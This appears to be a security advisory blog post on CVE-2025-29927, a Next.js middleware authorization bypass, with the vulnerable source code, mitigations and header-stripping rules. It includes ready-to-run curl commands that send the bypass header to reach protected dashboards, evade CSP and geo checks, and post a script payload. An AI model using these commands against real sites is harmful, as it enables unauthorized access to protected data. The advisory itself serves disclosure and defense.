Next.js Middleware Authorization Bypass – CVE-2025-29927

Posted on

Vulnerable Version

Prior to versions 14.2.25 and 15.2.3

Fixed Version

Upgrade in 14.2.25 and 15.2.3

Base Score

9.1 Critical                                                                  

Vendor Description:-

Next.js is a popular open-source web development framework built on top of React. It enables developers to build fast, SEO-friendly, and scalable web applications with features like server-side rendering (SSR), static site generation (SSG), and API routes—all out of the box. One of its key strengths is simplifying the process of creating full-stack applications by combining both frontend and backend logic in a single project structure

Vulnerability Description:-

CVE-2025-29927 reveals a major issue in how the Next.js middleware handles certain sorts of requests, potentially leading to authentication and authorization bypasses.

This vulnerability affects apps that use middleware for access control in certain settings.

The vulnerability originates from Next.js’ uneven processing of the custom x-middleware-subrequest headers. When this header is included in requests to protected routes, Next.js mistakenly allows the request to skip middleware processing entirely. The header instructs the Next.js runtime to bypass the middleware evaluation phase when processing the underlying route handler.

To exploit this vulnerability, an attacker simply needs to add the x-middleware-subrequest header to their HTTP requests when accessing protected resources. For example, a request to  /api/admin/users that would normally be blocked by middleware authorization checks will be processed normally when this header is present. The server processes the request as though middleware has already run and approved it, creating a complete security bypass. This header manipulation can be easily implemented using browser developer tools, curl commands, or simple scripts.

image 4

The susceptible code in the latest version that is vulnerable (v15.2.2) is as follows:


 export const run = withTaggedErrors(async function runWithTaggedErrors(params) {
 const runtime = await getRuntimeContext(params)
 const subreq = params.request.headers[`x-middleware-subrequest`]        [1]
 const subrequests = typeof subreq === 'string' ? subreq.split(':') : [] [2]

 const MAX_RECURSION_DEPTH = 5
 const depth = subrequests.reduce(                                       [3]
  (acc, curr) => (curr === params.name ? acc + 1 : acc),
  0
 )

 if (depth >= MAX_RECURSION_DEPTH) {                                     [4]
  return {
     waitUntil: Promise.resolve(),
     response: new runtime.context.Response(null, {
       headers: {
         'x-middleware-next': '1',
       },
     }),
   }
 }

The x-middleware-subrequest header is taken from the request on [1].
It’s then split using the : delimiter on [2], and ran through a reduce function that counts how many items in this array (subrequests) match the middleware filename on [3].
If this number is equal or more than MAX_RECURSION_DEPTH (which is 5) on [4], it then bypasses the functionality of the middleware and redirects to its route.

Impacts:-

This vulnerability opens several serious attack paths:

  1. Complete Authentication Bypass Attackers can access admin panels, private dashboards, or user data without logging in.
  2. Content Security Policy Bypass Middleware often sets CSP headers that prevent cross-site scripting. With this bypass, those protections vanish: curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ -H "Content-Type: text/html" --data "<script>alert('hacked')</script>" \ http://example-site.com
  3. Geographic Restrictions Bypass Many sites use middleware to restrict content by location. This header bypasses those checks: curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \ -H "CF-IPCountry: RU" http://example-site.com/eu-only-content

Mitigations

1. Update Next.js (Recommended)

  • Upgrade to Next.js version 15.2.3 or newer, or 14.2.25 or newer

2. Block the Dangerous Header (Temporary Fix)

  • If you can’t update right now, block the x-middleware-subrequest header:
    • For NGINX:
location / {
    proxy_set_header x-middleware-subrequest "";
}

For Apache:

RequestHeader unset x-middleware-subrequest

3. Add Extra Security (Defense-in-Depth)

  • Don’t rely only on middleware for security
  • Add server-side authentication checks (e.g., using NextAuth.js)
  • For sensitive routes, use multiple layers of protection

POC

If you attempt to access the dashboard without legal credentials, you will be sent to the login page.

image 6

To exploit the vulnerability, you can add the x-middleware-subrequest header with the value middleware:middleware:middleware:middleware:middleware in the request. The Next.js middleware will incorrectly process this header and bypass the authentication checks:

curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://your-ip:3000
image 7

As you can see, the dashboard is available without requiring authentication.

Leave a Reply

Your email address will not be published. Required fields are marked *